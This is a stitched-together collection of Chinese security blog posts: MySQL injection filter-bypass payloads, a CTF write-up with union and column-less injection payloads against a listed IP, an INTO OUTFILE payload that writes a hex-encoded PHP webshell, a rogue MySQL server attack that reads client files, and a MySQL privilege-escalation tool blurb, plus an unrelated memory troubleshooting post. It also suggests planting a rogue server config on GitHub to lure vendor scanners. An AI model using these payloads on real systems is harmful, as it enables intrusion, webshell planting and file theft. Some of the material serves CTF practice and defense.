过滤了单引号可以利用以下几种方法绕过。

1. 整数型注入
  整数型注入就不用多废话了，只有在判断表名和列名的时候需要用到单引号，但是可以利用char函数和16进制绕过。利用sql语句写入文件的时候也可以利用16进制，因为mysql会将16进制解析。
2. 字符型注入
  gbk编码，另外可以根据具体的waf/ips规则进行bypass，比如dedecms中的全局过滤ips绕过方式。

过滤select

其实过滤了select基本无解，起码在我这个菜逼眼里是这样的，但是也要考虑特殊情况。比如今年的强网杯的一道题目，虽然过滤了select但是可以堆叠查询，因此有了绕过的方法。

//用到的语句
set语句可用于向系统变量或用户变量赋值。 eg: SET @s1ye=test;
PREPARE stmt_name FROM preparable_stmt 定义预处理语句，它将包含占位符(?)的查询传递给MySQL服务器。
EXECUTE stmt_name  执行预处理语句

过滤逗号

1. 盲注：

   利用from 1 for 1

2. 可回显注入：

   利用 A join B

3. 使用like：

   select user() like ‘r%’;

4. limit时的利用方法在下面limit部分。

A join B:
  INNER JOIN（内连接,或等值连接）：获取两个表中字段匹配关系的记录。
  LEFT JOIN（左连接）：获取左表所有记录，即使右表没有对应匹配的记录。
  RIGHT JOIN（右连接）： 与 LEFT JOIN 相反，用于获取右表所有记录，即使左表没有对应匹配的记录。
  用法就很简单了，我们用的到第一种方法，INNER可以省略，效果一样。
  eg: select a.name,b.password from users a join passwd n;
  在回显注入下使用：
  ?id=-1 union select * from ((select 1)a join (select 2)b join (select 3)c join (select 4)d)

from 1 for 1:
  没啥好说的直接看例子，eg
  ?id=-1 union select 1,2,ascii(substr((database()) from 1 for 1))='r'--+

"like" eg:(tablename=name)
  select * from name where id =1 and (select group_concat(table_name) from information_schema.tables where table_schema=database()) like 'n%';

比较符号绕过

1. between a and b：返回a，b之间的数据，不包含b。
2. greatest()、least()：（前者返回最大值、后者返回最小值）

​ eg: select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

​ 所以上述语句就是与64比较，当页面正常返回时说明真实的ascii码小于或等于64，继续fuzz即可。

等号绕过

可以使用like、rlike、regexp 或者<>。盲注时也可以利用运算符，^、+、-等，观察返回结果与页面变化即可，举一反三灵活运用。

order by 注入

利用oder by盲注的话看文章：

一道题引发的无列名注入

注入点在order by 后的盲注
1. if（条件语句）
  ?order=if((1=1),sleep(3),1)
2. 直接and if
  看图
3. rand()盲注：
  order by rand(true); order by rand(false);

注入点在order by 后的报错注入:
1. 利用procedure存储过程
2. XPATH
   select * from name order by extractvalue(1,concat('~',database(),'~'));

#利用LINES TERMINATED BY方式getshell
   ?order=1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E

limit注入

注入点在limit后的注入：
  同样的利用procedure存储过程 （https://www.leavesongs.com/PENETRATION/sql-injections-in-mysql-limit-clause.html）
看文章就可以了

如果注入中需要用到limit但是又过滤了逗号，可以利用以下方法。
select * from users limit 0,1;
# 等价于↓
select * from users limit 1 offset 0;

盲注带外

直接看文章，利用dnslog带外的话需要一些权限，比如必须有FILE权限、secure_file_priv为空而不是NULL（不为空就只能读限定目录的文件）

chabug一位师傅的文章

substr替换

mid,left,right,substring,lpad,rpad等

题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。

常规联合查询注入

http://152.136.179.79:18084/?id=3 union select 1,2,3

三个字段

http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database())

拿到flag所在的表，继续查列名

http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13')

死活查不出来，应该是过滤了column关键字，没有列名怎么查出来数据呢？？？

有两种方法
1. order by盲注
2. 子查询

本地测试建表

order by盲注

order by用于根据指定的列对结果集进行排序。一般上是从0-9a-z这样排序，不区分大小写。

先来本地测试一下

可以看到我们构造的数据排在了第一行

仍然在第一行

当拿’q’和’pass’做比较时，我们构造的数据被排在了第二行。由此可以来根据不同的回显来逐位判断。

拿我们这道题来说

1的时候我们的数据在前

2的时候原始数据在前，说明第一位是1

然后判断第二位

1a的时候我们的数据在前

1b的时候原始数据在前，说明第二位是1a

由此逐位判断。

子查询

在无列名的情况下，用子查询可以很简单的将数据跑出来。

子查询是将一个查询语句嵌套在另一个查询语句中。在特定情况下，一个查询语句的条件需要另一个查询语句来获取，内层查询（inner query）语句的查询结果，可以为外层查询（outer query）语句提供查询条件。

这个语句将列名转换为了1,2,3，这个时候列名就已知了，我们可以用子查询将数据归并。

此时就能查出来数据了，然后我们再来看这个题。

我们已知了表名为this_1s_th3_fiag_tab13，但是不知道这个表有几个字段

可以用联合查询的方式来判断字段数。

查出数据

拿到我们这个题里来

payload

http://152.136.179.79:18084/?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

子查询真是个好东西👍

写在文后

本文介绍了两种无列名注入的方式，很巧妙的在没有列名的情况下查出来数据，在实际利用中更推荐用子查询的方式，毕竟盲注有可能费力不讨好。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

这应该是一个比较老的问题了，前几天看到其他人聊到这个问题，拿出来分析一下。

简单的讲，就是我们可以伪造一个 MySQL 的服务端，甚至不需要实现 MySQL 的任何功能（除了向客户端回复 greeting package），当有客户端连接上这个假服务端的时候，我们就可以任意读取客户端的一个文件，当然前提是运行客户端的用户具有读取该文件的权限。

在复现的时候，有些地方踩到了一些坑，原作者没有说明，特此记录一下。

0x00 LOAD DATA INFILE

这个问题主要是出在LOAD DATA INFILE这个语法上，这个语法主要是用于读取一个文件的内容并且放到一个表中。通常有两种用法，分别是：

load data infile "/data/data.csv" into table TestTable;
load data local infile "/home/lightless/data.csv" into table TestTable;

有时候也会与FIELDS TERMINATED BY '\n'一起使用，效果更佳。这两种用法的区别就是差了一个local，第一个 SQL 语句的意思是，读取服务器上/data/data.csv文件，并写入到TestTable中；第二个 SQL 语句的意思则是，读取本地（客户端）这边的/home/lightless/data.csv文件，并写入到TestTable中。而我们这次要利用的也就是LOAD DATA LOCAL INFILE这种形式。

通过查阅 MySQL 的官方文档，在文档上，官方也指出了这个语法的问题：

那么接下来，我们来看下如何构造一个恶意的 MySQL 服务端来读取客户端的文件。

Capture The Package

如果想构造这样的服务端，首先要搞明白 MySQL 的交互流程，测试环境如下：

• Ubuntu 18.04
• MySQL 官方 APT 仓库安装的 5.7.23

通过 Wireshark 抓取 3306 端口的数据包，一开始发现 MySQL 的数据包全部走了 SSL 通信。

仅有一开始的两个 MySQL 的包，后面全是 SSL 数据了，这样也就没法搞明白是怎么读客户端文件的了。我们需要把 SSL 关掉，只需要关闭 MySQL Client 端的 SSL 即可，在配置文件的[mysql]节添加skip_ssl（或者关掉服务端的 SSL 支持也可以）：

这样 Wireshark 中就可以抓到正常的数据包了。会发现一共有这样几步：

1. greeting 包，获取服务端的 banner；
   
2. 登录请求包；
   
3. 初始化的一些查询，比如select @@version_comment limit 1之类的；
   

接下来我们找到关键的LOAD DATA INFILE数据包，第一个包看起来比较正常，是客户端发起的Request Query，如果你无法使用LOAD DATA INFILE语法的话，考虑在连接 MySQL 的时候加上--enable-local-infile选项，或者设置local_infile全局变量为ON

但是紧接着，服务端回复了一个包含刚刚请求中文件名的包，这里把/etc/passwd又给发回去了：

然后客户端向服务端发送了/etc/passwd文件的内容：

看到这里，也许开始有点想法了，如果我们在客户端发送查询之后，返回一个Response TABULAR数据包，并附上我们指定的文件，是不是就可以读取客户端的文件了，答案是肯定的。正如官方文档中提出的安全风险，”In theory, a patched server could be built that would tell the client program to transfer a file of the server’s choosing rather than the file named by the client in the LOAD DATA statement.”，可以看到，客户端读取哪个文件其实并不是自己说了算的，是服务端说了算的，形象一点的说就是下面这个样子：

• 客户端：hi~ 我将把我的 data.csv 文件给你插入到 test 表中！
• 服务端：OK，读取你本地 data.csv 文件并发给我！
• 客户端：这是文件内容：balabal！

正常情况下，这个流程不会有什么问题，但是如果我们制作了恶意的客户端，并且回复服务端任意一个我们想要获取的文件，那么情况就不一样了。

• 客户端：hi~ 我将把我的 data.csv 文件给你插入到 test 表中！
• 服务端：OK，读取你本地的 / etc/passwd 文件并发给我！
• 客户端：这是文件内容：balabal（/etc/passwd 文件的内容）！

看到这里可能有同学会问，“即便可以读任意文件，那也要等到客户端发起 LOAD DATA INFILE” 的时候才能回复呀！如果你刚才仔细阅读官方文档上的安全风险的话，会发现有这么一句：”A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL”

伪造的服务端可以在任何时候回复一个 file-transfer 请求，不一定非要是在LOAD DATA LOCAL的时候。这里有一点要说明的是，如果想要利用此特性，客户端必须具有 CLIENT_LOCAL_FILES 属性，这一点也会在下文提到的官方数据包格式文档中有所说明，这也是为什么在前面测试的时候需要添加--enable-local-infile的原因。

0x02 Pseudo Server

那么我们现在可以开始制作我们的服务端了，主要是以下几个步骤：

1. 向 MySQL Client 发送Server Greeting
2. 等待 Client 端发送一个Query Package
3. 回复一个file transfer请求

现在要解决的就是两个问题，分别是Server Greeting包和file transfer包的格式，不过也不难，这些包的格式都可以在 MySQL 的官方文档上找到，首先来看File Transfer的包格式，Protocol::LOCAL_INFILE_Request，这幅图也可以发现，我们需要等待一个来自 Client 的查询请求，才能回复这个读文件的请求

官方文档上还贴心的准备了一个 Example：

0c 00 00 01 fb 2f 65 74    63 2f 70 61 73 73 77 64    ...../etc/passwd

数据包的内容其实是从\xfb开始的，这个字节代表包的类型，后面紧跟要读取的文件名。前面的0x0c是数据包的长度（从 \ xfb 开始计算），长度后面的三个字节\x00\x00\x01是数据包的序号。

同理，我们很容易就能根据这份文档获取Greeting的数据包结构。如果感觉自己伪造比较困难的话，可以直接提取前面通过 Wireshark 抓到的包，修改一下长度、文件名之类的字节即可。

这里给一个Greeting包的样例，每个字段的作用均已表明，参考文档不难理解。

'\x0a',  # Protocol
'6.6.6-lightless_Mysql_Server' + '\0',  # Version
'\x36\x00\x00\x00',  # Thread ID
'ABCDABCD' + '\0',  # Salt
'\xff\xf7',  # Capabilities, CLOSE SSL HERE!
'\x08',  # Collation
'\x02\x00',  # Server Status
"\x0f\x80\x15", 
'\0' * 10,  # Unknown
'ABCDABCD' + '\0',
"mysql_native_password" + "\0"

接下来就是动手写 PoC 了，如果不想自己动手，可以参考 “参考文档” 中的 PoC。

一开始构造好的时候，用客户端去连接，总是提示 ERROR 2026 (HY000): SSL connection error: protocol version mismatch 或者 ERROR 2027 (HY000): Malformed packet。如果你在构造 PoC 的时候也出现了这种问题，很大可能是握手包构造的有问题，对照文档仔细检查。客户端默认是支持 SSL 的，服务端需要告诉客户端服务端不支持，我通过两次分别抓 “服务端支持 SSL” 和“服务端不支持 SSL”的包进行比对，再参考文档，找到了关闭 SSL 的方法，就是Capabilities这两个字节，\xf7 则表示不支持 SSL，如果不明白，抓个包比对一下就懂了。

仔细观察下图中的各种字段，避免踩坑。

Exploit it!

a. MySQL Client

使用 MySQL Client 进行测试，效果拔群：

b. PHP with mysqli

PHP通过mysqli连接恶意数据库，效果拔群：

c. PHP with PDO

默认未开启MYSQL_ATTR_LOCAL_INFILE属性，需要手工开启才可以以。

d. Python with MySQLdb

原作者说无效，但是我测试了一下，效果拔群。

e. Python3 with mysqlclient

效果拔群。

f. Java with JDBC Driver

效果拔群。

z. Others

其他语言各位可以自行测试。

Defense And Thinking

对于这种攻击的防御，说起来比较简单，首先一点就是客户端要避免使用 LOCAL 来读取本地文件。但是这样并不能避免连接到恶意的服务器上，如果想规避这种情况，可以使用--ssl-mode=VERIFY_IDENTITY来建立可信的连接。

当然最靠谱的方式还是要从配置文件上根治，关于配置上的防御问题，可以参考这篇文档进行设置。

用途的话，做蜜罐是肯定可以的，但是受众面好像不太完整，各种语言的支持都不太一样，比如 Python 中的 MySQLdb 包，原作者说这个包不受影响，但是我测试的时候确是受影响的，而 PHP+PDO 的方式又不受影响，所以能否中招还是要靠一些运气。

而且这些语言中的三方包在连接MySQL的时候，基本上在连接成功之后都会发出一下SELECT语句来查询一些版本号、编码之类的数据，这就达成了前面提到过的第二个攻击条件：等待客户端发来一个QUERY请求，所以如果这些第三方包允许执行LOAD DATA INFILE，危害还是比较大的。

参考文档

• http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

拓展猥琐思路

各大厂商做了GitHub的代码监控，把我们的恶意MySQL配置信息和各大厂商的特征码放GitHub上，自然有厂商的扫描器光临…

这两天网站一直出现

Error establishing a database connection

登录服务器一看发现是MySQL服务挂了，这已经出现了好几次。今天我非得解决他不可。

先看下日志

130728  6:50:14 [Note] Plugin 'FEDERATED' is disabled.
130728  6:50:14 InnoDB: The InnoDB memory heap is disabled
130728  6:50:14 InnoDB: Mutexes and rw_locks use GCC atomic builtins
130728  6:50:14 InnoDB: Compressed tables use zlib 1.2.3.4
130728  6:50:14 InnoDB: Initializing buffer pool, size = 128.0M
InnoDB: mmap(137363456 bytes) failed; errno 12
130728  6:50:14 InnoDB: Completed initialization of buffer pool
130728  6:50:14 InnoDB: Fatal error: cannot allocate memory for the buffer pool
130728  6:50:14 [ERROR] Plugin 'InnoDB' init function returned error.
130728  6:50:14 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
130728  6:50:14 [ERROR] Unknown/unsupported storage engine: InnoDB
130728  6:50:14 [ERROR] Aborting
130728  6:50:14 [Note] /usr/sbin/mysqld: Shutdown complete

百度了一波，发现是因为MySQL5.5占用内存太大，然后服务器撑不住就挂了。我也是无奈脸，MySQL也欺负穷人。

解决方法：

修改my.ini

innodb_buffer_pool_size = 64M

根据自己服务器的性能来配置MySQL的性能，太小网站卡，太大服务挂。你明白我意思吧？

如果可以的话你需要设置下swap分区。因为我的vps是没有swap分区的，通过fdisk -l 和 1mount 看不到swap的信息，需要手动添加一下。

添加swap分区的步骤：

2.1) dd if=/dev/zero of=/swapfile bs=1M count=1024
2.2) mkswap /swapfile
2.3) swapon /swapfile
2.4) 添加这行： /swapfile swap swap defaults 0 0 到 /etc/fstab

重启MySQL服务。

这两天再观察观察会不会挂了。

https://github.com/v5est0r/Python_FuckMySQL

python-promoting-privileges

1.自动导出你的backdoor和mof文件，

2.自动判断mysql版本，根据版本不同导出UDF的DLL到不同目录，UDF提权

3.导出LPK.dll文件，劫持系统目录提权

4.写启动项提权

工具仅做方便使用，技术含量几乎没有。

用py脚本写的，也打包成exe了，个人用的还算顺手。

用法：

promote:PythonDemo v5est0r$ python root.py
  __            _    __  __       ____   ___  _
 / _|_   _  ___| | _|  \/  |_   _/ ___| / _ \| |
| |_| | | |/ __| |/ / |\/| | | | \___ \| | | | |      Author：v5est0r